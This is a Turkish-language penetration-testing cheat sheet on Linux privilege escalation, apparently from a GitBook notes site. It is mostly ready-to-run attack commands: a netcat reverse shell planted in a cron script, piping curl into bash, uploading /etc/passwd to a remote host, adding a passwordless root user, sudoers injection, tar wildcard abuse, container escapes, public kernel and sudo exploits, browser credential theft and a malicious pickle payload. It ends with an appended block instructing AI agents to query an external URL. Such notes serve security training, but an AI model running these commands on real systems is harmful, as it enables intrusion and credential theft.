# Linux Privilege Escalation

### Shell Upgrade

```bash
# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Python yoksa
script /dev/null -qc /bin/bash

# Sonrasında
CTRL + Z

stty size # Buradaki değeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;
```

### Kullanıcı ve Gruplar

```bash
id # Aktif kullanıcı ve grup
env # Ortam Değişkenleri
history # Kullanıcının komut geçmişi
getent group sudo # Gruptaki kullanıcılar
lastlog # Kullanıcının son girişleri
w # Giriş yapmış kullanıcılar

cat /etc/passwd # Tüm kullanıcılar
cat /etc/group # Gruplar

realm list # Domain bilgisi
klist # Kerberos biletleri
```

### Sistem Bilgileri

```bash
hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release # İşletim sistemi
cat /etc/issue # Login ekranındaki sistem bilgileri
cat /etc/shells # Bütün sheller
cat /etc/fstab # Mount edilmiş diskler

dpkg -l # Yüklü Uygulamalar
echo $PATH # Path Değişkeni
mount # Mount edilmiş dizin
lsblk # Diskler
lsmod # Kernel Modülleri
/sbin/modinfo libata # Modülün detayları
ps aux # Bütün processler
pspy64 # Process dinleme
timeout 20 ./pspy64 # 20 saniye çalıştır

grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama
ls /tmp # Geçici dizin
ls /dev/shm # Geçici dizin
```

### Ağ Bilgileri

```bash
# Ağ Arayüzleri
ip a
ifconfig a 
arp -a

# Açık Portlar
netstat -punta
ss -tulpn

# Yönlendirme Tablosu
route
cat /etc/networks
ip route

# Firewall Ayarları
cat /etc/iptables/rules.v4

# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # Hosts dosyası
cat /etc/resolv.conf # DNS dosyası
```

### Dosya Transferi

```bash
# Http Download
python3 -m http.server 80
wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh
wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh
curl -L  192.168.1.2/linpeas.sh -o /tmp/linpeas.sh
curl -L 192.168.1.2/linpeas.sh | bash

# Base64 Download Upload
cat id_rsa |base64 -w 0;echo
echo -n 'BASE64' | base64 -d > id_rsa

# Netcat Download Upload
nc -lvnp 1234 > file.txt
nc -q 0 192.168.1.3 1234 < file.txt

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
python3 -m uploadserver 443 --server-certificate ~/server.pem
curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure
```

### Önemli Dizinler

```bash
python2.7 laZagne.py all
python3 laZagne.py browsers
ls -l .mozilla/firefox/ | grep default 
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
python3.9 firefox_decrypt.py

# Configs
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done


# Config Files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null


find / -type f -iname "*config*" 

# Databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

# Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

# Private Keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

# Public Keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

# Bash History
tail -n5 /home/*/.bash*

# Documents
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

# Log Files
cat /var/log/messages
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/secure
cat /var/log/boot.log
cat /var/log/dmesg
cat /var/log/kern.log
cat /var/log/faillog
cat /var/log/cron
cat /var/log/mail.log
cat /var/log/httpd
cat /var/log/mysqld.log
cd /var/spool/mail # Mail dosyaları

cat /proc/self/environ # Env değişkenleri
cat /proc/self/cmdline # Servisin komutu


# Log Search
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

# Kerberos Tickets
find / -name *keytab* -ls 2>/dev/null

# All Domain Credentials
./linikatz.sh 
```

### CronJobs

```bash
cat /etc/crontab
ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # Kullanıcının Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama
./pspy64 -pf -i 1000 # Processleri dinler

# Bütün Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# Root Shell Exploit
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bash; chmod +s /tmp/bash' > backup.sh
/tmp/bash -ip

# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh
```

### World Writable Dosyalar

```bash
find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null

# Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

# Veya Parolasız
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd

# Eğer shadow yazılabilir ise
mkpasswd -m yescrypt password
nano /etc/shadow

# Eski parolalar bu dosyada
cat /etc/security/opasswd


unshadow passwd shadow > unshadowed.hashes
hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt
```

### SUID Binary

```bash
find / -user root -perm -4000 2>/dev/null
find / -user root -perm -6000 2>/dev/null

# Aşağıdaki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya

cp /bin/bash > backup.config
./backup.sh
```

### SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

```bash
sudo -l

# NOPASSWD:ALL ROOT olan bir sh dosyası varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash
```

### Binary Capabilities

GTFOBins: <https://gtfobins.github.io/>

```bash
/usr/sbin/getcap -r / 2>/dev/null

# Bunlar gereksiz
#/usr/bin/ping = cap_net_raw+ep
#/usr/bin/mtr-packet = cap_net_raw+ep
```

### Wildcard Abuse

Eğer bir cronjob'da \* karakteri varsa aşağıdaki exploit uygulanabilir.

```bash
echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip
```

### Yetkili Gruplar

```bash
id

# lxd Grup
lxc image import alpine.tar.gz --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/bash

# Docker Grup
docker image ls
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

# Disk Grup

# Adm Grup
cd /var/log
```

### Screen Privilege Esc

```bash
wget https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/refs/heads/main/exploit.sh
bash exploit.sh
```

### Logrotten

```bash
# Crate veya compress varsa exploit çalışır
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c
gcc logrotten.c -o logrotten -static
./logrotten -p ./reverse /tmp/tmp.log

```

### Shared Object Hijacking

```bash
ldd payroll
readelf -d payroll  | grep PATH
gcc rev.c -fPIC -shared -o /development/libshared.so
```

### Python Module Permission

```
import psutil
available_memory = psutil.virtual_memory()

grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
os.system('id')
```

### Automated

```bash
# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80

# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt
```

### Firefox Creds

Decrypter: <https://github.com/unode/firefox_decrypt>

```bash
cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json
```

### Kernel Exploit

```bash
cat /etc/issue
cat /etc/lsb-release
uname -r

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
```

### Sudo < 1.9.5p2

CVE-2021-3156: <https://github.com/worawit/CVE-2021-3156>

```bash
# Eğer zafiyetli ise sudoedit: /: not a regular file segfault hatası alırız
sudoedit -s /

sudo --version
sudo -V

python3 sudo_lpe.py
```

### Dirty Pipe

Checker: <https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker>

DirtyPipe: <https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits>

```bash
uname -r # Hedef
dpipe.sh 5.10.0 # Local

gcc exploit-1.c -o dpipe1 -static
gcc exploit-2.c -o dpipe2 -static

./dpipe1
./dpipe2 /usr/bin/su
```

### Screen 4.5.0

Exploit: <https://github.com/YasserREED/screen-v4.5.0-priv-escalate>

### Pwnkit

```bash
wget https://github.com/ly4k/PwnKit/raw/refs/heads/main/PwnKit
./PwnKit
```

### Pickle Priv Esc

```bash
import torch
import os

class Payload:
    def __reduce__(self):
        return (os.system, ("whoami",))

evil = Payload()
torch.save(evil, 'evil.pth')
```

### APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)

```
cd /etc/apt/apt.conf.d
echo 'apt::Update::Pre-Invoke {"revshell"};' > shell
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/linux-pentesting/linux-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.